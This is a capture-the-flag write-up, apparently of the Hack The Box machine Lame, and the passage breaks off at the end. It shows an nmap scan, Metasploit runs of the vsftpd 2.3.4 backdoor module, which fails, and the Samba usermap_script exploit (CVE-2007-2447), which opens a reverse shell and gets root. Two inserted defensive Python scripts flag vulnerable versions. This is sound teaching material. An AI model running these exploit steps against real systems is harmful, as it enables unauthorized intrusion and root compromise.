I will be covering write-ups of all retired machines, so stay tuned for future posts!
As always, let's start by enumerating running services on the target:
```
nmap -T4 -A -v 10.10.10.3

Starting Nmap 7.60 ( https://nmap.org ) at 2017-09-17 15:29 EDT
NSE: Loaded 146 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 15:29
Completed NSE at 15:29, 0.00s elapsed
Initiating NSE at 15:29
Completed NSE at 15:29, 0.00s elapsed
Initiating Ping Scan at 15:29
Scanning 10.10.10.3 [4 ports]
Completed Ping Scan at 15:29, 0.23s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:29
Completed Parallel DNS resolution of 1 host. at 15:29, 0.02s elapsed
Initiating SYN Stealth Scan at 15:29
Scanning 10.10.10.3 [1000 ports]
Discovered open port 22/tcp on 10.10.10.3
Discovered open port 21/tcp on 10.10.10.3
Discovered open port 139/tcp on 10.10.10.3
Discovered open port 445/tcp on 10.10.10.3
Completed SYN Stealth Scan at 15:29, 11.30s elapsed (1000 total ports)
Initiating Service scan at 15:29
Scanning 4 services on 10.10.10.3
Completed Service scan at 15:29, 11.36s elapsed (4 services on 1 host)
Initiating OS detection (try #1) against 10.10.10.3
Retrying OS detection (try #2) against 10.10.10.3
Initiating Traceroute at 15:29
Completed Traceroute at 15:29, 0.13s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 15:29
Completed Parallel DNS resolution of 2 hosts. at 15:29, 0.02s elapsed
NSE: Script scanning 10.10.10.3.
Initiating NSE at 15:29
NSE: [ftp-bounce] PORT response: 500 Illegal PORT command.
Completed NSE at 15:30, 40.10s elapsed
Initiating NSE at 15:30
Completed NSE at 15:30, 0.00s elapsed
Nmap scan report for 10.10.10.3
Host is up (0.12s latency).
Not shown: 996 filtered ports
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 10.10.14.3
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: OpenWrt White Russian 0.9 (Linux 2.4.30) (92%), Arris TG862G/CT cable modem (91%), Dell Integrated Remote Access Controller (iDRAC6) (91%), Linksys WET54GS5 WAP, Tranzeo TR-CPQ-19f WAP, or Xerox WorkCentre Pro 265 printer (91%), Linux 2.4.21 - 2.4.31 (likely embedded) (91%), Linux 2.4.27 (91%), Citrix XenServer 5.5 (Linux 2.6.18) (91%), Linux 2.6.22 (91%), Linux 2.6.8 - 2.6.30 (91%), Dell iDRAC 6 remote access controller (Linux 2.6) (91%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 2.311 days (since Fri Sep 15 08:02:47 2017)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=206 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-os-discovery:
|   OS: Unix (Samba 3.0.20-Debian)
|   NetBIOS computer name:
|   Workgroup: WORKGROUP\x00
|_  System time: 2017-09-17T14:57:26-04:00
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE (using port 22/tcp)
HOP RTT       ADDRESS
1   123.67 ms 10.10.14.1
2   123.15 ms 10.10.10.3
```
So there is vsFTPd 2.3.4, which allows anonymous login in this instance. SSH is open, and so is Samba (version 3.0.20).
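The same banners read from the defender's side, as an added example that is not part of the original write-up: a small Python parser that inventories the open services from nmap's normal output and flags versions on a watchlist, so an asset owner sees "vsftpd 2.3.4" and "Samba 3.0.20" as findings before anyone else does. The sample input is constructed from the scan above; the watchlist entries, the regexes and the function names are my own assumptions. It also shows the edge case the scan exhibits: the 139/tcp banner "3.X - 4.X" carries no usable version and is deliberately not reported.

```python
"""Inventory exposed services from nmap normal output and flag watchlisted versions."""
import re

# Constructed sample: the service lines from a scan like the one above.
NMAP_SAMPLE = """\
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
"""

# One "port/proto state service version" line of nmap's normal output.
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")

# Assumed watchlist: (banner prefix, comparison, version, note).
# "eq" flags one exact release, "lt" flags everything before the fix.
WATCHLIST = [
    ("vsftpd", "eq", "2.3.4", "release briefly shipped with a backdoor; verify the build"),
    ("Samba smbd", "lt", "3.0.25", "CVE-2007-2447 (username map script), fixed in 3.0.25"),
]


def parse_version(text):
    """First dotted numeric version in text as a tuple of ints, or None."""
    m = re.search(r"(\d+(?:\.\d+)+)", text)
    return tuple(int(p) for p in m.group(1).split(".")) if m else None


def parse_services(output):
    """Return the open services as dicts with port, proto, service and version."""
    services = []
    for line in output.splitlines():
        m = PORT_LINE.match(line.strip())
        if m and m.group(3) == "open":
            services.append({
                "port": int(m.group(1)),
                "proto": m.group(2),
                "service": m.group(4),
                "version": m.group(5).strip(),
            })
    return services


def flag_vulnerable(services, watchlist=WATCHLIST):
    """Return (port, product, version, note) for every watchlisted service."""
    findings = []
    for svc in services:
        for product, op, ref_version, note in watchlist:
            if not svc["version"].startswith(product):
                continue
            seen = parse_version(svc["version"][len(product):])
            if seen is None:
                continue  # banner like "3.X - 4.X": version unknown, nothing to report
            ref = parse_version(ref_version)
            if (op == "eq" and seen == ref) or (op == "lt" and seen < ref):
                findings.append((svc["port"], product, ".".join(map(str, seen)), note))
    return findings


if __name__ == "__main__":
    for port, product, version, note in flag_vulnerable(parse_services(NMAP_SAMPLE)):
        print(f"{port}/tcp {product} {version}: {note}")
```

In practice the watchlist would be loaded from a vulnerability feed rather than hard-coded, and the parser would be fed `nmap -oN` output for every host in scope; the point is that a banner-level version check is cheap enough to run continuously.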
Metasploit has some neat modules for enumerating a few things related to Samba. Let's check out the named pipes, in case there is anything of interest.
```
msf > use auxiliary/scanner/smb/pipe_auditor
msf auxiliary(pipe_auditor) > show options

Module options (auxiliary/scanner/smb/pipe_auditor):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS                      yes       The target address range or CIDR identifier
   SMBDomain  .                no        The Windows domain to use for authentication
   SMBPass                     no        The password for the specified username
   SMBUser                     no        The username to authenticate as
   THREADS    1                yes       The number of concurrent threads

msf auxiliary(pipe_auditor) > set rhosts 10.10.10.3
rhosts => 10.10.10.3
msf auxiliary(pipe_auditor) > run

[*] 10.10.10.3:139 - Pipes: \netlogon, \lsarpc, \samr, \eventlog, \lsass, \ntsvcs, \srvsvc, \wkssvc
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
Right off the bat, a quick search for vsFTPd 2.3.4 shows that this version briefly shipped with a built-in backdoor, and wouldn't you know, there is a Metasploit module for it.
```
msf auxiliary(smb_version) > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit(vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  21               yes       The target port (TCP)

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(vsftpd_234_backdoor) > set rhost 10.10.10.3
rhost => 10.10.10.3
msf exploit(vsftpd_234_backdoor) > run

[*] 10.10.10.3:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.10.10.3:21 - USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.
```
Darn, no luck. This copy must not contain the backdoor. A quick login and check as the anonymous FTP user gets us nowhere. We are jailed to an empty directory.
Another quick search for Samba 3.0.20 reveals CVE-2007-2447, which is an RCE vulnerability that requires no authentication. Metasploit also conveniently has a built-in module for this, so let's give it a shot.
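For anyone responsible for a Samba host rather than attacking one, the setting behind CVE-2007-2447 is the `username map script` option in smb.conf, which hands the client-supplied username to an external command; Samba 3.0.25 fixed the injection. The following is an added example, not from the original post: a Python audit that parses an smb.conf and reports the option as critical on a pre-fix version and as informational afterwards. The sample configuration is constructed for illustration, and the parser handles only the Samba conventions the check needs (comment lines, `[section]` headers, `key = value` pairs).

```python
"""Audit smb.conf for the 'username map script' setting behind CVE-2007-2447."""
import re

# Constructed sample smb.conf (assumed for illustration, not the target's file).
SMB_CONF_SAMPLE = """\
[global]
   workgroup = WORKGROUP
   server string = %h server (Samba, Ubuntu)
   ; maps client usernames through an external command
   username map script = /etc/samba/scripts/mapusers.sh

[tmp]
   path = /tmp
   read only = no
   guest ok = yes
"""

SECTION = re.compile(r"^\[(.+)\]$")


def parse_smb_conf(text):
    """Return {section: {key: value}}; section and key names are lower-cased.

    Handles '#' and ';' comment lines, '[section]' headers and 'key = value'
    pairs. Line continuations are not supported in this small parser.
    """
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        m = SECTION.match(line)
        if m:
            current = m.group(1).strip().lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)
            sections[current][key.strip().lower()] = value.strip()
    return sections


def audit_username_map(sections, samba_version):
    """Return (severity, message) findings for 'username map script'.

    samba_version is a tuple such as (3, 0, 20), taken from the service banner
    or the installed package. CVE-2007-2447 was fixed in Samba 3.0.25.
    """
    findings = []
    script = sections.get("global", {}).get("username map script")
    if script is None:
        return findings
    version_text = ".".join(str(p) for p in samba_version)
    if samba_version < (3, 0, 25):
        findings.append(("CRITICAL",
                         f"username map script = {script} on Samba {version_text}: "
                         "unauthenticated command injection (CVE-2007-2447); "
                         "upgrade, or remove the option"))
    else:
        findings.append(("INFO",
                         f"username map script = {script}: an external command runs "
                         "with the client-supplied username at session setup; keep "
                         "Samba patched and the script minimal"))
    return findings


if __name__ == "__main__":
    conf = parse_smb_conf(SMB_CONF_SAMPLE)
    for severity, message in audit_username_map(conf, (3, 0, 20)):
        print(f"[{severity}] {message}")
```

Run against a real host, the version tuple would come from `smbd -V` or the package manager rather than from a banner, since banners can be suppressed or wrong.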
```
msf exploit(vsftpd_234_backdoor) > use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  139              yes       The target port (TCP)

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(usermap_script) > set rhost 10.10.10.3
rhost => 10.10.10.3
msf exploit(usermap_script) > run

[*] Started reverse TCP double handler on 10.10.14.3:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 0MefBteS03VkpAjA;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "0MefBteS03VkpAjA\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.10.14.3:4444 -> 10.10.10.3:55479) at 2017-09-17 15:52:35 -0400

pwd
/
whoami
root
```
Bingo! We are in as the root user. From here we just grab our flags from